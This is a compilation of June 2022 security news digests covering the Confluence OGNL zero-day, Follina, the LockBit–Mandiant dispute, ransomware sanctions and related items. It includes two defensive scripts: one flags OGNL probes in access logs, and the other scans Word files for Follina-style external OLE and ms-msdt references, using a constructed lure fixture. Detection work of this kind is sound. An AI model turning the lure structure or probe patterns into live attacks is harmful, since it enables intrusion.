- Threat Advisory: Atlassian Confluence zero-day vulnerability under active exploitation
- Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw
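The advisory above notes that CVE-2022-26134 is an OGNL injection reached through an ordinary HTTP request of any method. As an added triage example (not code from the original article or from Atlassian), the script below parses constructed combined-format access-log lines from a server in front of Confluence and flags requests whose URI, after percent-decoding is exhausted, contains the OGNL expression opener `${`; the log lines, IP addresses and the `${...}` bodies are placeholders, not real traffic or working payloads.

```python
"""Triage access-log lines for CVE-2022-26134-style OGNL probes (added example)."""
import re
from urllib.parse import unquote

# Combined log format: ip ident user [timestamp] "METHOD URI HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
OGNL_OPENER = "${"

# Constructed sample lines: the ${...} bodies are placeholders, not payloads.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 4521
203.0.113.11 - - [03/Jun/2022:10:01:05 +0000] "GET /%24%7Bconstructed-ognl-sample%7D/ HTTP/1.1" 302 0
203.0.113.12 - - [03/Jun/2022:10:01:09 +0000] "POST /%24%7Bconstructed-ognl-sample%7D/ HTTP/1.1" 302 0
203.0.113.13 - - [03/Jun/2022:10:01:12 +0000] "PUT /%2524%257Bconstructed-ognl-sample%257D/ HTTP/1.1" 302 0
203.0.113.14 - - [03/Jun/2022:10:01:20 +0000] "GET /rest/api/content?limit=25 HTTP/1.1" 200 812
"""


def decode_fully(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable; double encoding is a common filter-evasion trick."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def is_ognl_probe(uri: str) -> bool:
    """True if the decoded URI carries an OGNL expression opener anywhere in it."""
    return OGNL_OPENER in decode_fully(uri)


def triage(log_text: str) -> list[dict]:
    """Return one record per suspicious request, whatever the HTTP method."""
    hits = []
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw.strip())
        if not m:
            continue  # not a request line we understand; skip rather than crash
        if is_ognl_probe(m["uri"]):
            hits.append({
                "ip": m["ip"],
                "method": m["method"],
                "status": int(m["status"]),
                "decoded_uri": decode_fully(m["uri"]),
            })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['status']} {hit['decoded_uri']}")
```

A hit here is a reason to check the host for the patch level and for dropped web shells, not proof of compromise on its own; a 302 with an odd path is what the probe typically leaves behind in the log.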
ChinaChopper web shell pops up again on backs of Atlassian bugs
The ChinaChopper web shell is being spread as part of the attacks exploiting the zero-day vulnerability in Atlassian Confluence. Attackers exploiting CVE-2022-26134 install ChinaChopper but rarely access it, leading researchers to believe that it’s being used as a source of backup access. The nearly 11-year-old malware allows attackers to retain access to an infected system using a client-side application that contains all the logic required to control the target. Cisco Talos has documented several instances of different threat groups using China Chopper. This web shell is widely available, so almost any threat actor can use it. This also means it’s nearly impossible to attribute attacks to a particular group using only the presence of China Chopper as an indicator.
Read more in
- Exploitation of Atlassian Confluence zero-day surges fifteen-fold in 24 hours
- Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability
Evil Corp’s Sanctions Evasion Attempts Fall Flat
With sanctions against Evil Corp proving effective, it’s tempting to suggest ramping them up against the wider ransomware ecosystem. However, these sanctions are best used as a stick to punish the worst actors, not as a catch-all tool.
On Monday, the LockBit ransomware group claimed to have breached cybersecurity firm Mandiant on its leak site.
Rather than being a genuine breach, this looks to be retaliation for a Mandiant report released last week that linked Evil Corp to LockBit ransomware.
Evil Corp was originally sanctioned by the US Treasury department in 2019 for crimes including the development and distribution of Dridex banking malware. Since these sanctions were announced, Evil Corp has cycled through a succession of homegrown ransomware variants in increasingly quick succession. Mandiant believes that sanctions made it difficult for the group to extract ransom payments and as each new variant was associated publicly with Evil Corp the subsequent payment difficulties forced it to develop and migrate to a new variant.
Mandiant speculates that Evil Corp has since given up on its own strains and migrated to using ransomware from other Ransomware-as-a-Service operators to muddy attribution. Rather than being identifiable because it uses exclusive homegrown ransomware, it could blend in with other affiliates.
This makes total sense for Evil Corp, but it appears that LockBit doesn’t want to be tarred by the same sanction brush. It’s a reasonable concern for them. Victims will be reluctant to pay up when they’re hit by LockBit because the affiliate who actually deployed the malware might be on a sanctions list. The penalties for breaking Treasury sanctions can be stiff, up to USD$1m in fines and 20 years in prison per violation, so groups involved in payments (such as insurers and ransomware recovery and negotiation firms) aren’t keen to accidentally break any of them.
Mandiant claims LockBit’s fake hack was an attempt to discredit its report, but we think it’s more a case of juvenile payback and an attempt to distinguish itself from Evil Corp.
When LockBit published the cache of files it claimed it stole from Mandiant, the files included a statement from LockBit distancing itself from Evil Corp and its leader Maxim Yakubets which boils down to “our group has nothing to do with Evil Corp”.
One might look at Evil Corp using other RaaS as evidence that sanctions against ransomware actors are ineffective, but this incident proves the opposite. Sanctioned groups work hard to avoid them, and other criminal gangs don’t want anything to do with the sanctioned entities.
If that is not compelling enough, at this week’s RSA conference Rob Joyce, NSA’s Director of Cybersecurity, confirmed that ransomware operators had changed their behaviour due to sanctions. “How do we know? Really? We’re NSA… we’ve heard them say it is hard to get funds out,” he said.
So, if sanctions are effective, why not sanction all the groups? Surely this would drive down payments to the ransomware ecosystem?
For a start, there is a certain baseline amount of public information that is needed to effectively levy sanctions, as explored in a ProPublica article we linked to some weeks ago. It’s far better to list named individuals rather than meaningless groups that are constantly being rebranded, but it can be hard for the Treasury office responsible to point to reliable public information.
Additionally, victims are already more reluctant to pay Russian ransomware crews, as sanctions against Russian entities have expanded since the invasion of Ukraine. Even groups such as Conti — that aren’t specifically listed — could be sanctioned because of possible ties to listed entities such as the FSB. In other words, payments are already generally being throttled, so doing the work to specifically name more groups might not be worth it.
There may also simply be better things for Treasury to focus on. Reuters this week reports on cryptocurrency exchange Binance’s laundering of USD$2.35bn of funds over time. Why go for amorphous ransomware groups when exchanges are easier to target and may offer a far bigger payoff in terms of effects across the ecosystem? (Obviously blanket sanctions on the world’s largest cryptocurrency exchange are a non-starter, but there are levers to pull.)
And although sanctions look to be effective at reducing payments to ransomware groups, this is probably not the best measure of success. If it were, governments should simply make ransomware payments illegal. Job done! Ransomware solved!
Using sanctions as a behavioural lever to reduce the amount of disruption that ransomware causes looks to be a better approach: apply sanctions to the most damaging ransomware groups to encourage ransomware crews to behave “better”.
So we should enjoy the schadenfreude in this LockBit and Evil Corp incident, but let’s keep sanctions for the most damaging groups.
Internet Anonymity Targeted in Authoritarian States and Democracies Alike
Both authoritarian states and democracies are clamping down on internet freedoms and anonymity, each for entirely different reasons.
Let’s start with the authoritarian countries. Roskomnadzor, the Russian telecommunications watchdog, has ordered that the Tor browser be removed from the Russian Google Play store and also cracked down on use of VPNs. Together these appear to form part of a concerted effort to limit Russian citizens’ access to anonymising and censorship evasion technologies.
Other internet restrictions occur for reasons that are plain odd. The Record reported the Syrian government shuts down internet access to prevent cheating in high school national exams. And it is not alone in this — according to an Access Now report released in May this occurs in several other countries including Bangladesh, Iran, Iraq and India.
However, Access Now’s report found that most internet shutdowns occur in response to political instability and that India, a democracy, was the biggest culprit with 106 shutdowns. These occurred mostly in Jammu and Kashmir rather than being nation-wide, but they are still worrying as some observers are concerned that India may be “set on a path to becoming an illiberal pseudo-democracy”.
In addition to liberal use of internet shutdowns, the Indian government is also imposing stringent cyber security regulations intended to make the Indian internet more “open, safe, trusted and accountable”.
Some of the regulations seem too broad to be useful and will capture too much of the internet’s background noise. For example, companies have just six hours to report a range of common (or vaguely defined) incidents to India’s Computer Emergency Response Team (CERT-In), including:
- Targeted scanning/probing of critical networks/systems
- Identity Theft, spoofing, and phishing attacks
- Malicious mobile apps posing as legitimate apps
- Unauthorised access to social media accounts
- Attacks or malicious/suspicious activities affecting systems/ servers/networks/ software/ applications related to Big Data, Blockchain, virtual assets, virtual asset exchanges, custodian wallets, Robotics, 3D and 4D Printing, additive manufacturing, Drones
This update recently lamented the US government’s lack of granular data on ransomware incidents and we are a fan of robust disclosure requirements — governments need to know what is happening on the internet to respond effectively. But this will just overwhelm CERT-In with the dull roar of the everyday internet.
These regulations also essentially spell the end of ‘no-log‘ VPN services, with VPN service providers (and also data centres and cloud service providers) being required to keep subscribers’ validated names, addresses, and IP address allocation information for five years. These kinds of VPNs are used for criminal activity, so there are good reasons the Indian government would want these logs kept.
As a result of these regulations, both ExpressVPN and Surfshark announced over the last week they have decided to remove their Indian VPN servers to avoid being subject to the regulation. Both are keeping Indian IP addresses in Singapore and the UK, so they say they will be able to serve customers wanting to appear to be in India. Other VPN services told The Record they might also remove their servers from India.
One concerning gap in the Indian regulations as they are published is that they don’t make clear what thresholds must be met for access to subscriber information. For example, the FAQ associated with the regulation states access to logs is at the discretion of CERT-In: “The requisition for seeking information is [sic] respect of logs may be given by an officer of CERT-In not below the rank of Deputy Secretary to the Government of India”.
Subsequent press reporting in The Economic Times makes it clear that this type of data would only be used by law enforcement agencies after they had followed standard procedures and obtained court orders, as happens in other democracies.
When push comes to shove, government authorities in democracies are often able to get IP addresses when they need to after following proper procedures. French authorities, for example, got the IP address of a French activist using ProtonMail’s services via Europol after approval from Swiss authorities, despite ProtonMail’s reputation and the “privacy cred” that comes with being Swiss-based.
What’s the lesson here? Governments of all stripes are no longer treating the internet as a regulation no-go zone, but different types of governments will make different decisions about where to draw the lines between privacy, anonymity, and security. Often these lines are drawn in the types of checks and balances found in democracies and less in the regulations themselves. As in: A metadata retention regime in Australia will result in different outcomes to the same sort of regulations applying in Myanmar.
iOS Safety Check
Apple announced iOS 16 will include Safety Check, a new feature to protect people in abusive relationships. It allows users to audit who else has access to passwords and other sensitive information such as location data and cut them off in one clean sweep.
PII market seized
The US government announced the seizure of the SSNDOB marketplace, an online marketplace that sold personally identifiable information (PII) of (mostly) US citizens, including social security numbers, dates of birth and names. It’s good to see international collaboration with both the Latvian and Cyprus police involved. Cryptocurrency analysis company Chainalysis reports SSNDOB has received USD$22m in Bitcoin since 2015, which probably understates the market’s importance as the PII it sold was used to enable fraud and other cyber crime.
Children’s hospital attack thwarted
At a cyber security conference FBI Director Christopher Wray said the organisation managed to prevent an attack by state-sponsored Iranian hackers on a Boston children’s hospital. It’s good it was stopped, but, like, wtf.
Schulte is Still Unpleasant
The New Yorker has a great long read about Joshua Schulte, the former CIA employee accused of leaking the agency’s hacking tools in the so-called Vault 7 document dump. The piece illustrates CIA office culture (more “Office Space” than “The Bourne Identity”) and what the author describes as “the pageantry of overclassification”. After the stolen and now publicly available materials were downloaded from WikiLeaks, for example, the investigators stored the laptop containing them in a safe and needed security clearances before they were allowed to view the material.
Schulte also comes across as a real piece of work. In addition to stealing and leaking secrets, Schulte is charged with child pornography offences (he claims he’s innocent, and that child pornography is a non-violent victimless crime anyway). How he ever got a job at the CIA is a mystery.
Chinese APT “Plumbing” Laid Bare
The US government has released a joint Cyber security Advisory detailing the techniques Chinese state-sponsored groups use “to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure” including by targeting “major telecommunications companies and network providers”.
The advisory includes a section on how PRC groups typically operate in telco networks. After gaining initial access via known vulnerabilities they target critical authentication systems to get network credentials. These credentials are then used to harvest router configuration information and subsequently to “surreptitiously route, capture and exfiltrate traffic out of the network”.
Rob Joyce, the NSA’s Director of Cybersecurity, told The Record that this advisory pulled together information about the top vulnerabilities Chinese actors are using to build foundational “plumbing”. By publishing this information the US government hopes companies will be able to identify and “stop the tradecraft”.
Cyber Command Did Something. We Have No Idea What.
US Cyber Command Director Paul Nakasone stated that the US had launched offensive cyber operations against Russia in support of Ukraine. White House Press Secretary Karine Jean-Pierre then confirmed that these operations did not violate the US policy of avoiding a direct military conflict. An offensive operation could be anything from popping a shell on an enemy C2 server to blowing up a building by fiddling with its HVAC system, so without further context, Nakasone’s statement is essentially an information-free zone. But at least they get to sound like they’re doing something important.
Microsoft’s Digital Crimes Unit (DCU) said on Friday that they disrupted infrastructure operated by Bohrium, a cyber-espionage group operating out of Iran.
Amy Hogan-Burney, DCU General Manager, said the DCU legal team successfully obtained a court order that granted Microsoft control over 41 domains used by the Bohrium group in spear-phishing operations.
“Our DCU investigation found Bohrium targeted customers in the US, Middle East, and India. Targets come from sectors including tech, transportation, government, and education,” Hogan-Burney said.
The Microsoft exec said the group’s members used fake social media profiles, often posing as recruiters, and lured employees at targeted organisations to one of the 41 malicious sites. Here, they tried to collect their personal information, which they later used in subsequent email attacks that sought to infect the victims with malware.
To date, Microsoft’s DCU team has used the US court system to seize domains and server infrastructure from more than two-dozen cybercrime and espionage groups alike.
The Kinsing, Hezb, and Dark.IoT botnets have been spotted exploiting the recently-disclosed Confluence zero-day CVE-2022-26134 to install their payloads on unpatched servers.
Follina gets some love
After being disclosed last week, the Office zero-day vulnerability known as Follina (CVE-2022-30190) is seeing broader adoption by the cyber-criminal underground after being previously adopted by nation-state groups, Proofpoint’s threat intelligence team reported, with the latest to get on the exploitation train being the Qbot malware botnet.
LockBit-Mandiant drama, explained
Standing as evidence that most ransomware gangs have the emotional intelligence of a petty 12-year-old online gamer, the group behind the LockBit ransomware pulled off one of the most cringe-worthy stunts in recent years after, on Monday, the group published an entry on its “leak site” claiming to have breached and encrypted the network of cybersecurity giant Mandiant (formerly FireEye).
The announcement made a huge initial wave through the cybersecurity community, but it didn’t take long for industry experts to regain their wits and realize how unrealistic such an intrusion would be.
Obviously, Mandiant dismissed the claims as untrue; a task made immensely easier by the LockBit gang itself, which failed to share any evidence of their successful attack.
But the reality is that there was no such intrusion and one had to read between the lines to understand what really happened over the weekend.
All of the Monday drama is actually related to a report Mandiant published last week on EvilCorp, a major Russian cybercrime cartel that previously operated the Dridex banking trojan and ransomware strains such as Locky, Hades, WastedLocker, and BitPaymer.
One of the report’s findings was that after getting sanctioned by the US Treasury in December 2019, the EvilCorp group has been having a harder and harder time receiving ransom payments following their intrusions, as victims and ransomware negotiators would not want to break sanctions, fearing fines and possible prosecution from US authorities.
Over the past two and a half years, EvilCorp tried to avoid the looming sanctions by developing new ransomware strains and constantly rebranding their Ransomware-as-a-Service (RaaS) portals, often posing as a new cybercrime group that just launched on the criminal underground.
However, security researchers kept finding clues linking these new services to the old EvilCorp gang. As this tactic appears to have become inefficient in recent months, Mandiant said last week that EvilCorp members began using the RaaS services of other gangs, hoping to disguise their real identity as a mere sub-group of another ransomware cartel.
But just by publishing its report last week, Mandiant indirectly nuked the profitability of the LockBit RaaS into the ground, six feet under, dead and buried.
Just by casually linking the EvilCorp brand with LockBit’s operation, Mandiant has (accidentally?/intentionally?) ensured that victims and ransomware negotiators would now be just as skittish in making or approving payments following a LockBit attack, fearing the legal hammer of US authorities. This means that LockBit’s profits are about to take a ginormous hit over the next few weeks—and LockBit knows it!
Hence, that’s why we had all that kindergarten-level drama on Monday, which was nothing else but LockBit trying to ruin Mandiant’s reputation in return, but with little success and only managing to make themselves look like fools in the process.
And LockBit also knows that nobody believed their wild claims since a few hours later, on Monday, the group also published a statement that is the definition of “damage control,” a statement where they tried to distance themselves from EvilCorp and their leader, Maksim Yakubets, claiming no association. Alas, good luck getting paid, LockBit!
The IT infrastructure of the city of Palermo, Italy, has been down since last Friday following a cyber-attack.
DeFi platform Maiar said on Monday that a threat actor exploited a vulnerability on its platform and stole more than $113 million worth of cryptocurrency from its wallets. In a YouTube video published on Tuesday, the platform’s CEO said they had already recovered 95% of the stolen funds.
The New Yorker has a fantastic profile of Joshua Schulte, the former CIA agent behind the WikiLeaks Vault7 leak.
iOS gets separate security update mechanism
At the WWDC 2022 developer conference this week, Apple announced plans to add a new feature to iOS called Rapid Security Response that will allow the company to deploy security updates to its devices as separate patches without needing to update the entire operating system. The new feature will be added in iOS 16, scheduled to be released later this fall.
iOS to protect victims of domestic abuse
In addition, at the same WWDC 2022 conference, Apple also announced plans to add another feature in iOS 16 to protect people in or leaving abusive relationships. Called Safety Check, the new feature will help users manage app access and passwords and let them know who else has their passwords and personal information. But the best feature is something called an “emergency reset” that allows users to sign out of iCloud, lock down privacy settings and limit incoming messages to only “the device in their hand.”
In an investigative piece published on Monday, Reuters has accused the Binance cryptocurrency platform of being ignorant of money laundering operations taking place on its platform. Reuters reporters said that Binance served as a conduit for the laundering of at least $2.35 billion in illicit funds, including from drug traffickers, online fraudsters, and North Korean hackers.
XLoader pauses Ukraine infections
The operators of the XLoader malware said in a post on a cybercrime forum that they will no longer infect Ukrainian systems due to the ongoing war.
Arrest in Vietnam
Vietnamese officials have detained a Taiwanese national on accusations of breaching the country’s financial system. According to a statement published over the weekend, the suspect engaged in “scanning for security holes, privilege escalation attacks, [and] unauthorized access to the management system of servers at banks to withdraw money in customers’ accounts.”
Passwordstate digital certificate
The Passwordstate password management company, which suffered a major security breach last year, said they revoked their digital certificate after they were informed by an Australian security firm that it had been used to sign malware payloads last week. More specifically, the malicious payloads were Office files weaponized with the recently disclosed Follina zero-day.
Skimmer detained in Ukraine
In the midst of its war with Russia, Ukrainian Cyber Police have detained a Bulgarian national on accusations of installing skimmers on ATM devices across the country.
A new pro-Russian hacktivist group called “Киберспецназ” (CyberSpecial Forces) has been spotted active online, with the group vowing to attack NATO countries. The group becomes the 115th cyberspace threat actor known to be involved in the Russo-Ukrainian conflict.
US and Cyprus officials have seized this week four web domains that hosted SSNDOB, a cybercrime marketplace known for selling access to detailed PII data. The website, which has been operating for a few years now, was listing the personal details of approximately 24 million Americans and made at least $19 million from its operation, the DOJ said on Tuesday.
Avast has released a decrypter for the TaRRaK ransomware, which has been infecting victims for almost a year since June 2021.
HP’s security team has published a report on SVCReady, a new malware loader strain delivered via malicious Office files. Researchers believe the malware may be linked to the TA551 threat actor.
Trellix has a summary of the cyber-attacks and cyber-espionage operations that have taken place since the onset of the Russo-Ukrainian war and all the threat actors involved.
Micropatch for another Microsoft zero-day
ACROS Security has released a micropatch for another zero-day vulnerability in the Windows operating system. This new zero-day, named DogWalk, was re-discovered last week after first being documented in 2020; it resides in the Microsoft Diagnostic Tool’s sdiageng.dll library and can be used to bypass Mark-Of-The-Web (MOTW) markings.
Microsoft classified this bug as a “won’t fix” when it was initially reported to the company.
Telegram denies vulnerability report
Instant messaging service Telegram denied claims made by a user on Twitter that its platform contained a vulnerability that could be used to obtain private and group chats. In a message sent to Reuters reporter Raphael Satter, the company called the claims “fantastic at best” and that they had “all the hallmarks of a hoax.”
Android security patches
Google has released the Android Security Bulletin for June 2022.
IBM acquires Randori
IBM’s cybersecurity arm has acquired Randori, a provider of offensive cybersecurity and attack surface management (ASM) services.
Follina Vulnerability Remains Unpatched
Microsoft has not yet released a patch to address the vulnerability known as Follina. The flaw affects the company’s Support Diagnostic Tool and can be exploited to take control of vulnerable devices. Microsoft has acknowledged that the flaw is being actively exploited and has published guidance that includes temporary mitigations. The vulnerability can be exploited through a maliciously-crafted Word document. The flaw affects all currently supported versions of Windows. Microsoft has not said whether or not it plans to release a patch for the vulnerability.
- This vulnerability should still be at the top of the list of things to worry about. You must implement the workaround to prevent exploitation. While anti-malware vendors are quickly updating signatures, they are inadequate to protect against the wide range of exploits that may take advantage of this vulnerability.
- The Microsoft guidance includes a workaround of disabling the MSDT service on each endpoint. Many endpoint protection tools are also now able to detect and block the attack, check to see if you’re covered there. Additionally verify your email security services are enabled, and are detecting and blocking this attack. While blocking externally sourced office documents is also an approach, use caution as this is likely impactful to the business and likely will be worked around by users.
- Just a reminder that SANS had a webinar on Follina you can view at https://www.sans.org/webcasts/emergency-webcast-msdt-ms-word-0-day/ and published a Follina Q&A with SANS instructor Jake Williams at https://www.sans.org/blog/follina-msdt-zero-day-q-a/
Read more in
- An Actively Exploited Microsoft Zero-Day Flaw Still Has No Patch
- Microsoft won’t say if it will patch critical Windows vulnerability under exploit
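The item above says Follina arrives in a maliciously-crafted Word document, and the comments point at endpoint and mail-gateway detection. As an added example (not Microsoft’s code and not from the original article), the scanner below inspects a .docx package for the widely documented Follina lure structure, which this example assumes: an `oleObject` relationship in `word/_rels/document.xml.rels` with `TargetMode="External"` fetching remote HTML that then invokes the `ms-msdt:` handler. The sample documents are constructed in memory and point at a reserved `.invalid` host.

```python
"""Scan a .docx package for Follina-style external OLE relationships (added example)."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REMOTE_SCHEMES = {"http", "https"}


def scan_docx(docx_bytes: bytes) -> list[dict]:
    """Return one finding per relationship that reaches outside the package in a risky way."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue  # only relationship parts can carry external targets
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                scheme = urlsplit(target).scheme.lower()
                external = rel.get("TargetMode", "Internal") == "External"
                if rel.get("Type") == OLE_REL and external and scheme in REMOTE_SCHEMES:
                    reason = "external OLE object loaded from a remote URL"
                elif scheme == "ms-msdt":
                    reason = "direct ms-msdt: protocol handler reference"
                else:
                    continue  # ordinary internal part (styles, images, ...)
                findings.append({"part": name, "id": rel.get("Id"),
                                 "target": target, "reason": reason})
    return findings


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal constructed .docx in memory with only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"

# Constructed relationship parts: a benign document and a Follina-style lure.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>
</Relationships>"""

LURE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="http://placeholder.invalid/constructed.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
        print(label, scan_docx(build_sample_docx(rels)) or "no findings")
```

Legitimate documents with linked OLE objects will also trigger the first rule, so treat a hit as a reason to quarantine and inspect, and pair it with the MSDT workaround from Microsoft’s guidance rather than relying on file scanning alone.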
Follina is Being Actively Exploited
Threat actors believed to be acting on behalf of an as-yet unidentified government have been exploiting the Follina vulnerability to target US and European government organizations. The threat actors sent at least 1,000 phishing messages that contained a maliciously-crafted document that pretended to be information about a salary increase.
- One set of Follina exploits sighted is taking advantage of a digital signature that was created using a key stolen from software company Clickstudio. More sophisticated exploits like this will often bypass defenses.
- Make sure your shields are up, IOCs in place and you’ve implemented your plan to mitigate the risks of a Follina attack.
Read more in
Audit Raises Questions About Federal Dam Cybersecurity Accountability
The Tennessee Valley Authority (TVA) Office of Inspector General’s audit of the TVA’s non-power dam control system cybersecurity “found no clear ownership of the non-power dam control system; vulnerable versions of operating systems and control system software; inappropriate logical and physical access; [and] internal information technology controls [that] were not operating effectively or had not been designed and implemented.”
- The deficiencies are mostly basic security hygiene issues – Implementation Group 1 of the Critical Security Controls. Most of IG1 are really related to shortcomings in IT (or in this case OT) operations and governance – updating applications and operating systems to current versions, having clear business ownership of systems, etc. The TVA has said it will remedy deficiencies by May 2023 but the OT operations and governance issues should be addressed ASAP.
- This is foundational cyber hygiene. Make sure that you have a comprehensive inventory of systems and that ownership, particularly of the security, is well defined. Then make sure that you are verifying the security posture, remediating gaps when discovered. Verify you have policies and procedures to support systems being deployed as securely as possible with open lines of communication on not only how to approach that, but also how to remediate discovered issues without throwing anyone under the bus.
Read more in
- Accountability unclear as cybersecurity for federal dams falls short
- Request for Final Action – Audit 2022-17340 – Non-Power Dam Control System Cybersecurity (PDF)
Windows Autopatch Now in Preview
Microsoft has made its Windows Autopatch service available for public preview. The service will be generally available in July to customers with Windows Enterprise/Microsoft 365 E3 or E5 licenses.
- Per earlier NewsBites comments on Windows Autopatch, if you have the right licenses, try it out across a controlled test environment. The security gain is a given and application issues due to the patches are very likely to be less than you anticipate.
- Reducing the workload of keeping endpoints updated is a big win. This service is designed to work with enterprise devices, without necessitating a VPN connection. Note the prerequisites which include device management via Intune or Configuration Manager co-management, user accounts in Azure Active Directory or Hybrid Azure Active Directory Join. You may already meet these requirements for your enterprise systems.
- This should be enabled by default across all enterprises and systems. Fear of breaking applications is overstated. The risk of unpatched systems is a demonstrable problem.
Read more in
- Get started with Windows Autopatch: public preview
- Microsoft’s new ‘autopatch’ service for Windows PC just took another step forwards
- Microsoft: Windows Autopatch now available for public preview
Atlassian Releases Patches for Critical Confluence Server and Data Center Vulnerability
Atlassian has released fixes to address a vulnerability affecting its Confluence Server and Data Center. The flaw can be exploited by an unauthenticated user to execute arbitrary code. The issue affects all supported versions of Confluence Server and Data Center; the updated versions are 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. Customers who access their Confluence sites through an Atlassian.net domain are not affected.
- The flaw dates to Confluence Server and Data Center products version 1.3.0. The long-term fix, if you’re continuing to host your Atlassian instance, is to update to the latest long term support release. If you’re in a cluster, make sure that you don’t forget to update all the nodes. Atlassian is pushing customers towards a hosted solution; after you apply the updates, this would be a good time to have those conversations, to include recording any show-stoppers to avoid re-hashing known issues.
Read more in
- Confluence Security Advisory 2022-06-02
- Atlassian Issues Patch for Critical Confluence Zero-Day
- Atlassian patches zero-day affecting Confluence Data Center and Server
US Draft Legislation Would Create National Data Privacy and Security Framework
US legislators on both the House of Representatives and the Senate have released a discussion draft of legislation described as “a comprehensive national data privacy and data security framework.” The draft bill would designate the Federal Trade Commission (FTC) as regulator for the proposed rules, which would pre-empt most state data privacy and security laws.
- The US Congress has failed to pass federal data privacy laws many times over the past 15 years, so it is hard to be optimistic that this will actually pass, but some of the thornier issues (like the preemption issue) have been addressed in this draft. The FTC has a good track record in this area – SANS gave the agency a Difference Makers award back in 2013. If the law passes, the FTC will have a year to establish the new office and define squishy terms such as “reasonably necessary, proportionate, and limited…” The draft also attempts to address social media algorithms, a controversial area.
- One hopes this time we get something enacted. Getting a common bar at the federal level should help raise the bar across the nation. One thing to keep an eye on is which state laws are preserved/not preempted. Generally, state laws to be preserved include consumer protection, civil rights, student and employee privacy, data breach notification, contract and tort, fraud, theft and identity theft, unauthorized access to electronic devices, and unauthorized use of personal information, cyber stalking, cyber bullying, sexual harassment, etc.
Read more in
- New Data Privacy Draft Puts FTC in Driver’s Set, Preempts State Laws
- House and Senate Leaders Release Bipartisan Discussion Draft of Comprehensive Data Privacy Bill
New York’s Right to Repair Bill for Electronics
The New York State legislature has passed an electronics right-to-repair bill, the Fair Repair Act. The bill would require electronics makers to share diagnostic and repair information with consumers and independent repair shops and to make software, tools, and parts available to them. The governor has not yet signed the bill into law.
- This is a big step forward for local electronics repair shops in New York State, and offers hope for less expensive repair options, rather than wholesale replacement of damaged electronic devices. Once signed into law, there will be a year for implementation. Note the bill applies only to electronics; medical devices, home appliances, agricultural and off-road equipment, public safety communication equipment or motor vehicles are not subject to the bill.
- Note that for most enterprises, repairing mobile devices yourself will be significantly more expensive than even what Apple charges, but this may help drive repair prices down in the long run.
Read more in
- New York state passes first electronics right-to-repair bill
- New York state passes first-ever ‘right to repair’ law for electronics
Security Flaws in BD Synapsis, BD Pyxis, and Illumina Medical Devices
The US Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have warned of security vulnerabilities in several medical devices. Flaws in BD Pyxis automated medication dispensing systems could be exploited to gain access to protected health information (PHI). A vulnerability in the BD Synapsis microbiology informatics software platform could be exploited to modify data, which could result in incorrect or delayed treatment. A handful of vulnerabilities in Illumina in-vitro diagnostic devices and research use only instruments could be exploited to take control of unpatched devices.
- Illumina has released a patch that protects against remote exploitation as a stopgap until the permanent fix can be released; BD is releasing Synapsis v4.20 SR2 later this month to address the weakness. BD Pyxis is working to remove hard-coded credentials and is piloting a credential management solution as a long-term fix. In the interim, you’re going to want to make sure the devices are properly segmented, only allowing connections from authorized devices and users.
Read more in
- CISA Warns of Medical Device Security Vulnerabilities in BD Synapsys, Pyxis Devices
- Feds Issue Alerts for Several Medical Device Security Flaws
- FDA Urges Healthcare to Patch Severe Illumina Cybersecurity Vulnerabilities
- FDA: Patch Illumina DNA Sequencing Instruments, Stat
- FDA urges patch of Illumina devices with three critical flaws ranked 10 in severity
- ICS Advisory (ICSA-22-153-02) Illumina Local Run Manager
- ICS Medical Advisory (ICSMA-22-151-01) BD Pyxis
- ICS Medical Advisory (ICSMA-22-151-02) BD Synapsys
Palermo, Italy Suffers Cyberattack
Computer systems belonging to the city of Palermo, Italy were targeted in a cyberattack late last week. Palermo has a population of 1.3 million and is also a popular destination for tourists. As of Monday morning (June 6), all public services, websites, and portals are offline.
- Details are sparse; the actions taken align with a ransomware attack rather than a DDoS attack. Some services are operating with fax rather than digital communication mechanisms. The city has engaged an IT service restoration company, SISPI, which is also helping to coordinate updates as well as service restoration.
